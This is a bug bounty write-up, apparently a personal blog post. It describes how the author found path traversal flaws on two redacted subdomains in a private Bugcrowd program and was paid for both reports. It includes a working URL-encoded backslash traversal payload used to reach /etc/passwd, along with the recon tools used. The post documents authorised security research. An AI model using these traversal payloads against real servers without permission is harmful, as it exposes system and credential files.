Hello guys,
This is Anil back with another write-up on my bug hunting adventures. Here, I am sharing a few of my findings in one of the Bugcrowd Private Program.
At Nullcon 2020, I met my fellow bug bounty hunters and we had discussion about bugs. They also shared their experiences and I was motivated from them because for the last few months I was not doing any bug hunting.
After Nullcon 2020 I came back and I was planning to do some bug hunting. And then I recollected a bug which I found earlier but I could not exploit. So, I started with it again at evening 7.30 and I was doing recon and trying to exploit it. However, till 10.30 PM I could not find any way to exploit it and I was frustrated like hell. Then I got a conference call from Eldho, Nesooh and Abdulali and we were talking about some of our future plans in YAS and many other things. I told them about my situation and they told me to change the target and take some new target.

So, I opened my Bugcrowd account and I checked in the Program invitation and there are some new Targets. I choose one of them and when I checked the program there is no vulnerabilities so far reported. And I was like “Okay I will hunt this!”. I checked the scope there were two wild scope domains. I took both and ran sublister against both Targets and saved both for further recon. From the first domain I randomly took one subdomain (let’s call that https://abc.redact.com). When I checked the domain it looked like a static web page, so I ran a dirsearch and at the same time I ran a Burp Suite Spider too. All I got was https://abc.redact.com/static/ and it looked same as index page.
I tried some basic recons and some open redirect, XSS and all, but could not find anything.

Then I just tried https://abc.redact.com/static/../../ and it returned a 404 Error page then I changed the payload to https://abc.redact.com/static/\..\../ but same as 404 Error page.
What if I URL encoded the payload?

I tried https://abc.redact.com/static/%5c..%5c..%5c/ and checked the response. Bingooooo!! it was a blank page. And in one write-up I read the exact same thing while he was attempting path traversal.
Path Traversal Vulnerability
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system).This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.

Normally when we test for path traversal we try to find a dynamic parameter to fetch the files outside of the webroot folder.
http://examplesite.com/get-files.jsp?file=events.pdf
http://examplesite.com/get-page.php?home=abc.html
http://examplesite.com/some-page.asp?page=index.html
or we can also try without dynamic parameter
http://examplesite.com/../../../../some dir/some file
In my case the webapp does not have any dynamic parameters and the /static/ is vulnerable for the path traversal so we can choose this method. Now the task is to find a sensitive file such as /etc/passwd file using path traversal. So, I started looking for the /etc/passwd.
When I reached this point
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
it again threw a 404 error page and I suddenly added one more %5c and continued the search for the etc/passwd. Finally

Nb: It’s not real etc/passwd file because of privacy reasons
And the time was 01:00 AM the call was still going on and I told them I got the Path Traversal and all of us were excited. Then I made a report and sent it.

I did not stop my recon and I did recon on other subdomains, but I could not find anything. So I moved to another domain, Opened the previously saved subdomain list from the Sublister and started to recon one by one. We can call it as https://xyz.redact2.com and I ran dirsearch and I got a directory called /client/ which I did burp spider and got one more directory. I used the same method as I did in last domain and it ended up with one more Path Traversal. The time was 04:00 AM and I made a report and submitted that too. And

At this point, I was like:

Timeline
First Report
Initial Report: 12 Mar 2020, 01:30 AM
Triaged: 12 Mar 2020, 9:28 AM
Accepted: 12 Mar 2020, 4:58 PM
Bounty Awarded: 12 Mar 2020, 4:59 PM (2,100$)
Second Report
Initial Report: 12 Mar 2020, 04:05 AM
Triaged: 12 Mar 2020, 09:36 AM
Accepted: 12 Mar 2020, 05:12 PM
Bounty Awarded: 20 Mar 2020, 09:45 PM (2,100$)
Thanks for reading my write up. I hope you enjoyed it.